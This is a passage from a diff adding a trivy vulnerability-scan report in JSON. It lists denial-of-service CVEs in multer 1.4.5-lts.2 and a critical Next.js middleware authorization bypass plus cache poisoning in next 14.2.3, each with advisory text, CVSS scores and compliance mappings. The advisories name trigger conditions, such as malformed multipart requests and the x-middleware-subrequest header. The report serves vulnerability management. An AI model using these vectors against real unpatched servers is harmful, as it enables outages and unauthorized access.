"tool": { + "name": "trivy", + "version": "unknown" + }, + "location": { + "path": "package-lock.json", + "startLine": 0 + }, + "message": "multer: Multer vulnerable to Denial of Service via unhandled exception", + "title": "CVE-2025-48997", + "description": "Multer is a node.js middleware for handling `multipart/form-data`. A vulnerability that is present starting in version 1.4.4-lts.1 and prior to version 2.0.1 allows an attacker to trigger a Denial of Service (DoS) by sending an upload file request with an empty string field name. This request causes an unhandled exception, leading to a crash of the process. Users should upgrade to `2.0.1` to receive a patch. No known workarounds are available.", + "remediation": "https://avd.aquasec.com/nvd/cve-2025-48997", + "references": [], + "tags": [ + "vulnerability", + "pkg:multer@1.4.5-lts.2" + ], + "risk": { + "cwe": [ + "CWE-248" + ] + }, + "raw": { + "VulnerabilityID": "CVE-2025-48997", + "VendorIDs": [ + "GHSA-g5hg-p3ph-g8qg" + ], + "PkgID": "multer@1.4.5-lts.2", + "PkgName": "multer", + "PkgIdentifier": { + "PURL": "pkg:npm/multer@1.4.5-lts.2", + "UID": "99f2d2a7a48c940f" + }, + "InstalledVersion": "1.4.5-lts.2", + "FixedVersion": "2.0.1", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-48997", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:b5423a207c7b90cb213319b29f5a6320e76fbba9b188f4193067f30445ba46ac", + "Title": "multer: Multer vulnerable to Denial of Service via unhandled exception", + "Description": "Multer is a node.js middleware for handling `multipart/form-data`. A vulnerability that is present starting in version 1.4.4-lts.1 and prior to version 2.0.1 allows an attacker to trigger a Denial of Service (DoS) by sending an upload file request with an empty string field name. This request causes an unhandled exception, leading to a crash of the process. Users should upgrade to `2.0.1` to receive a patch. No known workarounds are available.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-248" + ], + "VendorSeverity": { + "ghsa": 3, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N", + "V40Score": 8.7 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "V3Score": 5.3 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2025-48997", + "https://github.com/expressjs/multer", + "https://github.com/expressjs/multer/commit/35a3272b611945155e046dd5cef11088587635e9", + "https://github.com/expressjs/multer/issues/1233", + "https://github.com/expressjs/multer/pull/1256", + "https://github.com/expressjs/multer/security/advisories/GHSA-g5hg-p3ph-g8qg", + "https://nvd.nist.gov/vuln/detail/CVE-2025-48997", + "https://www.cve.org/CVERecord?id=CVE-2025-48997" + ], + "PublishedDate": "2025-06-03T19:15:39.577Z", + "LastModifiedDate": "2026-04-15T00:35:42.02Z" + }, + "context": { + "sbom": { + "name": "multer", + "version": "1.4.5-lts.2", + "path": "/package-lock.json" + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 23.565733333333334, + "epss": 0.00249, + "epss_percentile": 0.48135, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 7, + "epss_multiplier": 1.00996, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "87e4175cbe5a176c", + "ruleId": "CVE-2025-7338", + "severity": "HIGH", + "tool": { + "name": "trivy", + "version": "unknown" + }, + "location": { + "path": "package-lock.json", + "startLine": 0 + }, + "message": "multer: Multer Denial of Service", + "title": "CVE-2025-7338", + "description": "Multer is a node.js middleware for handling `multipart/form-data`. A vulnerability that is present starting in version 1.4.4-lts.1 and prior to version 2.0.2 allows an attacker to trigger a Denial of Service (DoS) by sending a malformed multi-part upload request. This request causes an unhandled exception, leading to a crash of the process. Users should upgrade to version 2.0.2 to receive a patch. No known workarounds are available.", + "remediation": "https://avd.aquasec.com/nvd/cve-2025-7338", + "references": [], + "tags": [ + "vulnerability", + "pkg:multer@1.4.5-lts.2" + ], + "risk": { + "cwe": [ + "CWE-248" + ] + }, + "raw": { + "VulnerabilityID": "CVE-2025-7338", + "VendorIDs": [ + "GHSA-fjgf-rc76-4x9p" + ], + "PkgID": "multer@1.4.5-lts.2", + "PkgName": "multer", + "PkgIdentifier": { + "PURL": "pkg:npm/multer@1.4.5-lts.2", + "UID": "99f2d2a7a48c940f" + }, + "InstalledVersion": "1.4.5-lts.2", + "FixedVersion": "2.0.2", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-7338", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:6f3feccc664d1f1e3cddf653f1c97b7118b5736ae9b6292dab66ae27058aa782", + "Title": "multer: Multer Denial of Service", + "Description": "Multer is a node.js middleware for handling `multipart/form-data`. A vulnerability that is present starting in version 1.4.4-lts.1 and prior to version 2.0.2 allows an attacker to trigger a Denial of Service (DoS) by sending a malformed multi-part upload request. This request causes an unhandled exception, leading to a crash of the process. Users should upgrade to version 2.0.2 to receive a patch. No known workarounds are available.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-248" + ], + "VendorSeverity": { + "ghsa": 3, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "V3Score": 5.3 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2025-7338", + "https://cna.openjsf.org/security-advisories.html", + "https://github.com/expressjs/multer", + "https://github.com/expressjs/multer/commit/adfeaf669f0e7fe953eab191a762164a452d143b", + "https://github.com/expressjs/multer/security/advisories/GHSA-fjgf-rc76-4x9p", + "https://nvd.nist.gov/vuln/detail/CVE-2025-7338", + "https://www.cve.org/CVERecord?id=CVE-2025-7338" + ], + "PublishedDate": "2025-07-17T16:15:35.227Z", + "LastModifiedDate": "2026-04-15T00:35:42.02Z" + }, + "context": { + "sbom": { + "name": "multer", + "version": "1.4.5-lts.2", + "path": "/package-lock.json" + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 23.371600000000004, + "epss": 0.00041, + "epss_percentile": 0.12343, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 7, + "epss_multiplier": 1.00164, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "2affafc067aeae6e", + "ruleId": "CVE-2026-2359", + "severity": "HIGH", + "tool": { + "name": "trivy", + "version": "unknown" + }, + "location": { + "path": "package-lock.json", + "startLine": 0 + }, + "message": "multer: Multer: Denial of Service via dropped file upload connections", + "title": "CVE-2026-2359", + "description": "Multer is a node.js middleware for handling `multipart/form-data`. A vulnerability in Multer prior to version 2.1.0 allows an attacker to trigger a Denial of Service (DoS) by dropping connection during file upload, potentially causing resource exhaustion. Users should upgrade to version 2.1.0 to receive a patch. No known workarounds are available.", + "remediation": "https://avd.aquasec.com/nvd/cve-2026-2359", + "references": [], + "tags": [ + "vulnerability", + "pkg:multer@1.4.5-lts.2" + ], + "risk": { + "cwe": [ + "CWE-772" + ] + }, + "raw": { + "VulnerabilityID": "CVE-2026-2359", + "VendorIDs": [ + "GHSA-v52c-386h-88mc" + ], + "PkgID": "multer@1.4.5-lts.2", + "PkgName": "multer", + "PkgIdentifier": { + "PURL": "pkg:npm/multer@1.4.5-lts.2", + "UID": "99f2d2a7a48c940f" + }, + "InstalledVersion": "1.4.5-lts.2", + "FixedVersion": "2.1.0", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-2359", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:aa2cbc6cc4142d36b776703b3db65cfa9d406900e6e0fc75d58c73b8897a08cd", + "Title": "multer: Multer: Denial of Service via dropped file upload connections", + "Description": "Multer is a node.js middleware for handling `multipart/form-data`. A vulnerability in Multer prior to version 2.1.0 allows an attacker to trigger a Denial of Service (DoS) by dropping connection during file upload, potentially causing resource exhaustion. Users should upgrade to version 2.1.0 to receive a patch. No known workarounds are available.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-772" + ], + "VendorSeverity": { + "ghsa": 3, + "nvd": 3, + "redhat": 3 + }, + "CVSS": { + "ghsa": { + "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N", + "V40Score": 8.7 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-2359", + "https://cna.openjsf.org/security-advisories.html", + "https://github.com/expressjs/multer", + "https://github.com/expressjs/multer/commit/cccf0fe0e64150c4f42ccf6654165c0d66b9adab", + "https://github.com/expressjs/multer/security/advisories/GHSA-v52c-386h-88mc", + "https://nvd.nist.gov/vuln/detail/CVE-2026-2359", + "https://www.cve.org/CVERecord?id=CVE-2026-2359" + ], + "PublishedDate": "2026-02-27T16:16:25.467Z", + "LastModifiedDate": "2026-03-19T17:28:16.05Z" + }, + "context": { + "sbom": { + "name": "multer", + "version": "1.4.5-lts.2", + "path": "/package-lock.json" + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 23.351066666666668, + "epss": 0.00019, + "epss_percentile": 0.05291, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 7, + "epss_multiplier": 1.00076, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "80d0e617807f9c3a", + "ruleId": "CVE-2026-3304", + "severity": "HIGH", + "tool": { + "name": "trivy", + "version": "unknown" + }, + "location": { + "path": "package-lock.json", + "startLine": 0 + }, + "message": "multer: Multer: Denial of Service via malformed requests", + "title": "CVE-2026-3304", + "description": "Multer is a node.js middleware for handling `multipart/form-data`. A vulnerability in Multer prior to version 2.1.0 allows an attacker to trigger a Denial of Service (DoS) by sending malformed requests, potentially causing resource exhaustion. Users should upgrade to version 2.1.0 to receive a patch. No known workarounds are available.", + "remediation": "https://avd.aquasec.com/nvd/cve-2026-3304", + "references": [], + "tags": [ + "vulnerability", + "pkg:multer@1.4.5-lts.2" + ], + "risk": { + "cwe": [ + "CWE-459" + ] + }, + "raw": { + "VulnerabilityID": "CVE-2026-3304", + "VendorIDs": [ + "GHSA-xf7r-hgr6-v32p" + ], + "PkgID": "multer@1.4.5-lts.2", + "PkgName": "multer", + "PkgIdentifier": { + "PURL": "pkg:npm/multer@1.4.5-lts.2", + "UID": "99f2d2a7a48c940f" + }, + "InstalledVersion": "1.4.5-lts.2", + "FixedVersion": "2.1.0", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-3304", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:3b0f6823eb0c1e72928cebbdc160db403df646f5c8b21b9a9e90eaccb686a712", + "Title": "multer: Multer: Denial of Service via malformed requests", + "Description": "Multer is a node.js middleware for handling `multipart/form-data`. A vulnerability in Multer prior to version 2.1.0 allows an attacker to trigger a Denial of Service (DoS) by sending malformed requests, potentially causing resource exhaustion. Users should upgrade to version 2.1.0 to receive a patch. No known workarounds are available.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-459" + ], + "VendorSeverity": { + "ghsa": 3, + "nvd": 3, + "redhat": 3 + }, + "CVSS": { + "ghsa": { + "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N", + "V40Score": 8.7 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-3304", + "https://cna.openjsf.org/security-advisories.html", + "https://github.com/expressjs/multer", + "https://github.com/expressjs/multer/commit/739919097dde3921ec31b930e4b9025036fa74ee", + "https://github.com/expressjs/multer/security/advisories/GHSA-xf7r-hgr6-v32p", + "https://nvd.nist.gov/vuln/detail/CVE-2026-3304", + "https://www.cve.org/CVERecord?id=CVE-2026-3304" + ], + "PublishedDate": "2026-02-27T16:16:26.38Z", + "LastModifiedDate": "2026-03-19T17:28:33.81Z" + }, + "context": { + "sbom": { + "name": "multer", + "version": "1.4.5-lts.2", + "path": "/package-lock.json" + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 23.351066666666668, + "epss": 0.00019, + "epss_percentile": 0.05291, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 7, + "epss_multiplier": 1.00076, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "19ed6f114225796d", + "ruleId": "CVE-2026-3520", + "severity": "HIGH", + "tool": { + "name": "trivy", + "version": "unknown" + }, + "location": { + "path": "package-lock.json", + "startLine": 0 + }, + "message": "multer: Multer: Denial of Service via malformed requests", + "title": "CVE-2026-3520", + "description": "Multer is a node.js middleware for handling `multipart/form-data`. A vulnerability in Multer prior to version 2.1.1 allows an attacker to trigger a Denial of Service (DoS) by sending malformed requests, potentially causing stack overflow. Users should upgrade to version 2.1.1 to receive a patch. No known workarounds are available.", + "remediation": "https://avd.aquasec.com/nvd/cve-2026-3520", + "references": [], + "tags": [ + "vulnerability", + "pkg:multer@1.4.5-lts.2" + ], + "risk": { + "cwe": [ + "CWE-674" + ] + }, + "raw": { + "VulnerabilityID": "CVE-2026-3520", + "VendorIDs": [ + "GHSA-5528-5vmv-3xc2" + ], + "PkgID": "multer@1.4.5-lts.2", + "PkgName": "multer", + "PkgIdentifier": { + "PURL": "pkg:npm/multer@1.4.5-lts.2", + "UID": "99f2d2a7a48c940f" + }, + "InstalledVersion": "1.4.5-lts.2", + "FixedVersion": "2.1.1", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-3520", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:1aea2a5deada40cd424b21793dc1ffd01b2c216d423aacafc67d0013c6fd0530", + "Title": "multer: Multer: Denial of Service via malformed requests", + "Description": "Multer is a node.js middleware for handling `multipart/form-data`. A vulnerability in Multer prior to version 2.1.1 allows an attacker to trigger a Denial of Service (DoS) by sending malformed requests, potentially causing stack overflow. Users should upgrade to version 2.1.1 to receive a patch. No known workarounds are available.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-674" + ], + "VendorSeverity": { + "ghsa": 3, + "nvd": 3, + "redhat": 3 + }, + "CVSS": { + "ghsa": { + "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N", + "V40Score": 8.7 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-3520", + "https://cna.openjsf.org/security-advisories.html", + "https://github.com/expressjs/multer", + "https://github.com/expressjs/multer/commit/7e66481f8b2e6c54b982b34c152479e096ce2752", + "https://github.com/expressjs/multer/security/advisories/GHSA-5528-5vmv-3xc2", + "https://nvd.nist.gov/vuln/detail/CVE-2026-3520", + "https://www.cve.org/CVERecord?id=CVE-2026-3520" + ], + "PublishedDate": "2026-03-04T17:16:22.61Z", + "LastModifiedDate": "2026-03-09T18:03:23.1Z" + }, + "context": { + "sbom": { + "name": "multer", + "version": "1.4.5-lts.2", + "path": "/package-lock.json" + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 23.39586666666667, + "epss": 0.00067, + "epss_percentile": 0.20499, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 7, + "epss_multiplier": 1.00268, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "8b483b8e54efe250", + "ruleId": "CVE-2025-29927", + "severity": "CRITICAL", + "tool": { + "name": "trivy", + "version": "unknown" + }, + "location": { + "path": "package-lock.json", + "startLine": 0 + }, + "message": "nextjs: Authorization Bypass in Next.js Middleware", + "title": "CVE-2025-29927", + "description": "Next.js is a React framework for building full-stack web applications. Starting in version 1.11.4 and prior to versions 12.3.5, 13.5.9, 14.2.25, and 15.2.3, it is possible to bypass authorization checks within a Next.js application, if the authorization check occurs in middleware. If patching to a safe version is infeasible, it is recommend that you prevent external user requests which contain the x-middleware-subrequest header from reaching your Next.js application. This vulnerability is fixed in 12.3.5, 13.5.9, 14.2.25, and 15.2.3.", + "remediation": "https://avd.aquasec.com/nvd/cve-2025-29927", + "references": [], + "tags": [ + "vulnerability", + "pkg:next@14.2.3" + ], + "risk": { + "cwe": [ + "CWE-285", + "CWE-863" + ] + }, + "raw": { + "VulnerabilityID": "CVE-2025-29927", + "VendorIDs": [ + "GHSA-f82v-jwr5-mffw" + ], + "PkgID": "next@14.2.3", + "PkgName": "next", + "PkgIdentifier": { + "PURL": "pkg:npm/next@14.2.3", + "UID": "494c23d2c970c8b" + }, + "InstalledVersion": "14.2.3", + "FixedVersion": "13.5.9, 14.2.25, 15.2.3, 12.3.5", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-29927", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:03d8bc467ed49d9b588625219e50e54133acdb9c588237ee693b8aa0098d1007", + "Title": "nextjs: Authorization Bypass in Next.js Middleware", + "Description": "Next.js is a React framework for building full-stack web applications. Starting in version 1.11.4 and prior to versions 12.3.5, 13.5.9, 14.2.25, and 15.2.3, it is possible to bypass authorization checks within a Next.js application, if the authorization check occurs in middleware. If patching to a safe version is infeasible, it is recommend that you prevent external user requests which contain the x-middleware-subrequest header from reaching your Next.js application. This vulnerability is fixed in 12.3.5, 13.5.9, 14.2.25, and 15.2.3.", + "Severity": "CRITICAL", + "CweIDs": [ + "CWE-285", + "CWE-863" + ], + "VendorSeverity": { + "ghsa": 4, + "redhat": 4 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", + "V3Score": 9.1 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", + "V3Score": 9.1 + } + }, + "References": [ + "http://www.openwall.com/lists/oss-security/2025/03/23/3", + "http://www.openwall.com/lists/oss-security/2025/03/23/4", + "https://access.redhat.com/security/cve/CVE-2025-29927", + "https://github.com/vercel/next.js", + "https://github.com/vercel/next.js/commit/52a078da3884efe6501613c7834a3d02a91676d2", + "https://github.com/vercel/next.js/commit/5fd3ae8f8542677c6294f32d18022731eab6fe48", + "https://github.com/vercel/next.js/releases/tag/v12.3.5", + "https://github.com/vercel/next.js/releases/tag/v13.5.9", + "https://github.com/vercel/next.js/security/advisories/GHSA-f82v-jwr5-mffw", + "https://jfrog.com/blog/cve-2025-29927-next-js-authorization-bypass/", + "https://nvd.nist.gov/vuln/detail/CVE-2025-29927", + "https://security.netapp.com/advisory/ntap-20250328-0002", + "https://security.netapp.com/advisory/ntap-20250328-0002/", + "https://vercel.com/changelog/vercel-firewall-proactively-protects-against-vulnerability-with-middleware", + "https://www.cve.org/CVERecord?id=CVE-2025-29927" + ], + "PublishedDate": "2025-03-21T15:15:42.66Z", + "LastModifiedDate": "2025-09-10T15:49:40.637Z" + }, + "context": { + "sbom": { + "name": "next", + "version": "14.2.3", + "path": "/package-lock.json" + } + }, + "compliance": { + "owaspTop10_2021": [ + "A01:2021" + ], + "cweTop25_2024": [ + { + "id": "CWE-863", + "rank": 24, + "category": "Authorization" + } + ], + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 100.0, + "epss": 0.92118, + "epss_percentile": 0.99719, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 10, + "epss_multiplier": 4.68472, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "805b9e4959b28bb7", + "ruleId": "CVE-2024-46982", + "severity": "HIGH", + "tool": { + "name": "trivy", + "version": "unknown" + }, + "location": { + "path": "package-lock.json", + "startLine": 0 + }, + "message": "Next.js Cache Poisoning", + "title": "CVE-2024-46982", + "description": "Next.js is a React framework for building full-stack web applications. By sending a crafted HTTP request, it is possible to poison the cache of a non-dynamic server-side rendered route in the pages router (this does not affect the app router). When this crafted request is sent it 